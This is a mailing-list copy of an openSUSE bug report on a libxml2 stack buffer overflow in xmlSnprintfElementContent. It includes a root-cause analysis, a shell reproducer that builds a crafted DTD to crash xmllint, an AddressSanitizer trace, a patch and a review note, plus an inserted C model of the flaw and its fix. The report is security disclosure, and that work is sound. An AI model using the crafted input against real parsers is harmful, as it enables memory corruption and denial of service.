Mailinglist Archive: opensuse-bugs (4295 mails)

[Bug 1039063] New: VUL-0: libxml2: stack overflow vulnerability (xmlSnprintfElementContent func in valid.c)
  • From: bugzilla_noreply@xxxxxxxxxx
  • Date: Mon, 15 May 2017 11:27:28 +0000
  • Message-id: <bug-1039063-21960@http.bugzilla.suse.com/>
http://bugzilla.suse.com/show_bug.cgi?id=1039063


Bug ID: 1039063
Summary: VUL-0: libxml2: stack overflow vulnerability (xmlSnprintfElementContent func in valid.c)
Classification: openSUSE
Product: openSUSE Distribution
Version: Leap 42.2
Hardware: Other
OS: Other
Status: NEW
Severity: Normal
Priority: P5 - None
Component: Security
Assignee: security-team@xxxxxxx
Reporter: mikhail.kasimov@xxxxxxxxx
QA Contact: qa-bugs@xxxxxxx
Found By: ---
Blocker: ---

Ref: http://seclists.org/oss-sec/2017/q2/258
============================================
+++++++++++++++++++++++++++++++++++++++++++++++
+ 1) BUG 781333 - STACK OVERFLOW IN VALID.C
+ https://bugzilla.gnome.org/show_bug.cgi?id=781333
+++++++++++++++++++++++++++++++++++++++++++++++

Here is a quick analysis:
The function xmlSnprintfElementContent in valid.c is supposed to recursively dump the element content definition into a char buffer 'buf' of size 'size'. The variable 'len' is assigned strlen(buf) once. If content->type is XML_ELEMENT_CONTENT_ELEMENT, then (i) content->prefix (followed by ":") is appended to buf, if it actually fits, whereupon (ii) content->name is written to the buffer. However, the check whether content->name actually fits also uses the original 'len' rather than the updated buffer length strlen(buf), so the prefix bytes already in the buffer are not accounted for. This allows writing up to about 'size' bytes beyond the end of the buffer.

$ ./xmllint --version
/src/libxml2/.libs/lt-xmllint: using libxml version 20904-GITv2.9.4-16-g0741801
   compiled with: Threads Tree Output Push Reader Patterns Writer SAXv1 FTP HTTP DTDValid HTML Legacy C14N Catalog XPath XPointer XInclude Iconv ISO8859X Unicode Regexps Automata Expr Schemas Schematron Modules Debug

How to reproduce:
$ s=$(printf "%-757s" "0")
$ t=$(printf "%-4924s" "0")
$ echo '<!DOCTYPEa[<!ELEMENT a (F'"${s// /0}:${t// /0}"')><!ATTLIST a><!ELEMENT b EMPTY><!ATTLIST b s CDATA #IMPLIED>]><a/>' > bug1.xml
$ ./xmllint --valid bug1.xml
=================================================================
==17183==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffb66dac88 at pc 0x7f2daa004f13 bp 0x7fffb66d9820 sp 0x7fffb66d9818
WRITE of size 4925 at 0x7fffb66dac88 thread T0
    #0 0x7f2daa004f12 in xmlSnprintfElementContent__internal_alias /src/libxml2/valid.c:1323:9
    #1 0x7f2daa039d58 in xmlValidateElementContent /src/libxml2/valid.c:5445:6
    #2 0x7f2daa039d58 in xmlValidateOneElement__internal_alias /src/libxml2/valid.c:6152
    #3 0x7f2daa49b106 in xmlSAX2EndElementNs__internal_alias /src/libxml2/SAX2.c:2467:24
    #4 0x7f2da9f1a4ca in xmlParseElement__internal_alias /src/libxml2/parser.c:10212:3
    #5 0x7f2da9f33758 in xmlParseDocument__internal_alias /src/libxml2/parser.c:10962:2
    #6 0x7f2da9f622f5 in xmlDoRead /src/libxml2/parser.c:15445:5
    #7 0x7f2da9f622f5 in xmlCtxtReadFile__internal_alias /src/libxml2/parser.c:15690
    #8 0x521133 in parseAndPrintFile /src/libxml2/xmllint.c:2391:9
    #9 0x5184cd in main /src/libxml2/xmllint.c:3772:7
    #10 0x7f2da8eb382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #11 0x41d2b8 in _start (/src/libxml2/.libs/lt-xmllint+0x41d2b8)

Address 0x7fffb66dac88 is located in stack of thread T0 at offset 5128 in frame
    #0 0x7f2daa032e5f in xmlValidateOneElement__internal_alias /src/libxml2/valid.c:5943

  This frame has 5 object(s):
    [32, 82) 'fn.i' (line 5288)
    [128, 5128) 'expr.i' (line 5441)
    [5392, 10392) 'list.i' (line 5442) <== Memory access at offset 5128 partially underflows this variable
    [10656, 10660) 'extsubset' (line 5950)
    [10672, 10722) 'fn' (line 6063)
============================================
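To make the stale-length bug concrete, here is an added example, not libxml2 code and not part of the report, that models the XML_ELEMENT_CONTENT_ELEMENT branch with the PoC's dimensions: a 758-byte prefix ("F" plus 757 zeros), a 4924-byte local name, and a 5000-byte buffer, which is the size of the 'expr.i' object in the ASan frame above ([128, 5128)). The function names, the canary harness, the use of strlen() instead of xmlStrlen(), and the simplified check layout are assumptions of this example. The vulnerable routine keeps the bookkeeping described in the analysis above (len is never advanced after the prefix is appended); the fixed routine sizes the whole qualified name before any strcat, so no partial write precedes the bounds check.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not libxml2 code: a reduced model of the length bookkeeping
 * in the XML_ELEMENT_CONTENT_ELEMENT case of xmlSnprintfElementContent.
 * Names, harness and the buffer size 5000 are this example's assumptions. */

/* Vulnerable bookkeeping: 'len' is read once and never advanced after the
 * prefix and ":" are appended, so the name check compares against a stale
 * length and strcat() can run past 'size'. */
static void append_qname_vuln(char *buf, int size, const char *prefix,
                              const char *name)
{
    int len = (int)strlen(buf);

    if (prefix != NULL) {
        if (size - len < (int)strlen(prefix) + 10) {
            strcat(buf, " ...");
            return;
        }
        strcat(buf, prefix);
        strcat(buf, ":");
        /* bug: len is not updated; strlen(buf) is now len + strlen(prefix) + 1 */
    }
    if (size - len < (int)strlen(name) + 10) {   /* stale len */
        strcat(buf, " ...");
        return;
    }
    strcat(buf, name);                            /* overflows for long names */
}

/* Fixed bookkeeping: size the whole "prefix:name" before writing any of it,
 * so 'len' cannot go stale between two writes. */
static void append_qname_fixed(char *buf, int size, const char *prefix,
                               const char *name)
{
    int len = (int)strlen(buf);
    int qname_len = (int)strlen(name);

    if (prefix != NULL)
        qname_len += (int)strlen(prefix) + 1;     /* prefix plus ":" */
    if (size - len < qname_len + 10) {
        strcat(buf, " ...");
        return;
    }
    if (prefix != NULL) {
        strcat(buf, prefix);
        strcat(buf, ":");
    }
    strcat(buf, name);
}

typedef void (*append_fn)(char *, int, const char *, const char *);

/* Harness: 'size' logical bytes followed by a canary region, so an overflow is
 * measured instead of smashing the real stack. Returns the number of canary
 * bytes overwritten (0 means the write stayed within 'size'); optionally
 * copies the start of the resulting string into 'out'. */
#define CANARY_LEN 8192
static int run_with_canary(append_fn fn, int size, const char *prefix,
                           const char *name, char *out, size_t out_len)
{
    char *backing = malloc((size_t)size + CANARY_LEN);
    int clobbered = 0, i;

    memset(backing, 'C', (size_t)size + CANARY_LEN);
    backing[0] = '\0';                  /* empty buffer before the element is printed */
    fn(backing, size, prefix, name);
    for (i = 0; i < CANARY_LEN; i++)
        if (backing[size + i] != 'C')
            clobbered++;
    if (out != NULL && out_len > 0) {
        strncpy(out, backing, out_len - 1);
        out[out_len - 1] = '\0';
    }
    free(backing);
    return clobbered;
}

/* The report's PoC shape (constructed here): prefix "F" + 757 '0's (758
 * bytes), name of 4924 '0's, buffer of 5000 bytes. */
static int run_poc(int fixed, char *out, size_t out_len)
{
    char *prefix = malloc(759);
    char *name = malloc(4925);
    int n;

    prefix[0] = 'F';
    memset(prefix + 1, '0', 757);
    prefix[758] = '\0';
    memset(name, '0', 4924);
    name[4924] = '\0';
    n = run_with_canary(fixed ? append_qname_fixed : append_qname_vuln,
                        5000, prefix, name, out, out_len);
    free(prefix);
    free(name);
    return n;
}

static int poc_overflow_bytes(int fixed) { return run_poc(fixed, NULL, 0); }

static const char *poc_result_prefix(int fixed)
{
    static char head[16];
    run_poc(fixed, head, sizeof head);
    return head;
}

int main(void)
{
    printf("vulnerable: %d bytes past the buffer, output starts \"%s\"\n",
           poc_overflow_bytes(0), poc_result_prefix(0));
    printf("fixed:      %d bytes past the buffer, output starts \"%s\"\n",
           poc_overflow_bytes(1), poc_result_prefix(1));
    return 0;
}
```

With the PoC dimensions the vulnerable routine writes 684 bytes past the 5000-byte buffer (759 bytes of prefix and ":" plus 4924 bytes of name plus the terminating NUL, minus 5000), while the fixed routine emits only the " ..." truncation marker. The canary approach is the same observation ASan makes above, just without instrumentation.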

============================================
PATCHED BY:
--- a/valid.c
+++ a/valid.c
@@ -1270,6 +1270,7 @@ xmlSnprintfElementContent(char *buf, int size,
xmlElementContentPtr content, int
}
strcat(buf, (char *) content->prefix);
strcat(buf, ":");
+ len += xmlStrlen(content->prefix);
}
if (size - len < xmlStrlen(content->name) + 10) {
strcat(buf, " ...");
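Review bot: the added `len += xmlStrlen(content->prefix);` still leaves len one byte short of strlen(buf), because the `strcat(buf, ":");` immediately above it is not counted; the `+ 10` slack in the following `size - len < xmlStrlen(content->name) + 10` check absorbs that byte, but the bookkeeping should be exact, e.g. `len += xmlStrlen(content->prefix) + 1;`. Since the prefix is checked and written before the name is checked at all, a more robust shape is to compute the full prefix:name length once and test it against `size - len` before the first strcat, which removes the need to keep len in sync between two separate writes.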
============================================

(open-)SUSE: https://software.opensuse.org/package/libxml2

2.9.4 (TW, 42.2, official repo)
2.9.1 (42.1, official repo)

Upstream report -- https://bugzilla.gnome.org/show_bug.cgi?id=781333 -- has 'private' status.

--
You are receiving this mail because:
You are on the CC list for the bug.